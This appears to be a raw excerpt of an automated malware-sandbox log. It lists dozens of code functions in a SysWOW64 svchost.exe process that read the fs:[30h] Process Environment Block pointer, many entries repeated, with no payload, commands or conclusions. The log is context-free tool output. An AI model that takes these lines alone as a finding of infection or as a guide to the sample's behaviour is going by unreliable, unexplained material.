Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030663FF mov eax, dword ptr fs:[00000030h] 2_2_030663FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302823B mov eax, dword ptr fs:[00000030h] 2_2_0302823B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h] 2_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h] 2_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h] 2_2_0302A250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036259 mov eax, dword ptr fs:[00000030h] 2_2_03036259
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h] 2_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h] 2_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h] 2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h] 2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034260 mov eax, dword ptr fs:[00000030h] 2_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302826B mov eax, dword ptr fs:[00000030h] 2_2_0302826B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h] 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h] 2_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h] 2_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h] 2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h] 2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h] 2_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h] 2_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h] 2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h] 2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h] 2_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h] 2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h] 2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h] 2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h] 2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h] 2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h] 2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h] 2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h] 2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h] 2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h] 2_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h] 2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h] 2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h] 2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h] 2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h] 2_2_030F0115
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03060124 mov eax, dword ptr fs:[00000030h] 2_2_03060124
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h] 2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h] 2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h] 2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h] 2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h] 2_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h] 2_2_0302C156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h] 2_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036154 mov eax, dword ptr fs:[00000030h] 2_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03036154 mov eax, dword ptr fs:[00000030h] 2_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03070185 mov eax, dword ptr fs:[00000030h] 2_2_03070185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h] 2_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h] 2_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h] 2_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h] 2_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h] 2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h] 2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h] 2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h] 2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h] 2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h] 2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h] 2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h] 2_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h] 2_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h] 2_2_031061E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h] 2_2_030601F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h] 2_2_030B4000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h] 2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h] 2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h] 2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h] 2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h] 2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h] 2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h] 2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h] 2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h] 2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h] 2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h] 2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h] 2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h] 2_2_0302A020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h] 2_2_0302C020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h] 2_2_030C6030
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03032050 mov eax, dword ptr fs:[00000030h] 2_2_03032050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h] 2_2_030B6050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h] 2_2_0305C073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303208A mov eax, dword ptr fs:[00000030h] 2_2_0303208A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h] 2_2_030C80A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h] 2_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h] 2_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h] 2_2_030B20DE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_0302A0E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h] 2_2_030380E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h] 2_2_030B60E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h] 2_2_0302C0F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h] 2_2_030720F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h] 2_2_0306C700
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030710 mov eax, dword ptr fs:[00000030h] 2_2_03030710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03060710 mov eax, dword ptr fs:[00000030h] 2_2_03060710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h] 2_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h] 2_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306273C mov eax, dword ptr fs:[00000030h] 2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h] 2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306273C mov eax, dword ptr fs:[00000030h] 2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h] 2_2_030AC730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306674D mov esi, dword ptr fs:[00000030h] 2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306674D mov eax, dword ptr fs:[00000030h] 2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306674D mov eax, dword ptr fs:[00000030h] 2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03030750 mov eax, dword ptr fs:[00000030h] 2_2_03030750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h] 2_2_030BE75D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072750 mov eax, dword ptr fs:[00000030h] 2_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072750 mov eax, dword ptr fs:[00000030h] 2_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h] 2_2_030B4755
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038770 mov eax, dword ptr fs:[00000030h] 2_2_03038770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h] 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030D678E mov eax, dword ptr fs:[00000030h] 2_2_030D678E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030307AF mov eax, dword ptr fs:[00000030h] 2_2_030307AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h] 2_2_030E47A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h] 2_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h] 2_2_030B07C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h] 2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h] 2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h] 2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h] 2_2_030BE7E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030347FB mov eax, dword ptr fs:[00000030h] 2_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030347FB mov eax, dword ptr fs:[00000030h] 2_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h] 2_2_030AE609
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h] 2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h] 2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h] 2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h] 2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h] 2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h] 2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h] 2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03072619 mov eax, dword ptr fs:[00000030h] 2_2_03072619
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h] 2_2_0304E627
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03066620 mov eax, dword ptr fs:[00000030h] 2_2_03066620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03068620 mov eax, dword ptr fs:[00000030h] 2_2_03068620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0303262C mov eax, dword ptr fs:[00000030h] 2_2_0303262C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h] 2_2_0304C640
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F866E mov eax, dword ptr fs:[00000030h] 2_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030F866E mov eax, dword ptr fs:[00000030h] 2_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h] 2_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h] 2_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03062674 mov eax, dword ptr fs:[00000030h] 2_2_03062674
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034690 mov eax, dword ptr fs:[00000030h] 2_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03034690 mov eax, dword ptr fs:[00000030h] 2_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h] 2_2_0306C6A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h] 2_2_030666B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h] 2_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h] 2_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h] 2_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h] 2_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h] 2_2_030C6500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] 2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] 2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] 2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] 2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] 2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] 2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h] 2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h] 2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h] 2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h] 2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h] 2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h] 2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h] 2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h] 2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h] 2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h] 2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h] 2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h] 2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038550 mov eax, dword ptr fs:[00000030h] 2_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03038550 mov eax, dword ptr fs:[00000030h] 2_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h] 2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h] 2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h] 2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03032582 mov eax, dword ptr fs:[00000030h] 2_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h] 2_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03064588 mov eax, dword ptr fs:[00000030h] 2_2_03064588
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h] 2_2_0306E59C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h] 2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h] 2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h] 2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h] 2_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h] 2_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h] 2_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h] 2_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h] 2_2_030365D0
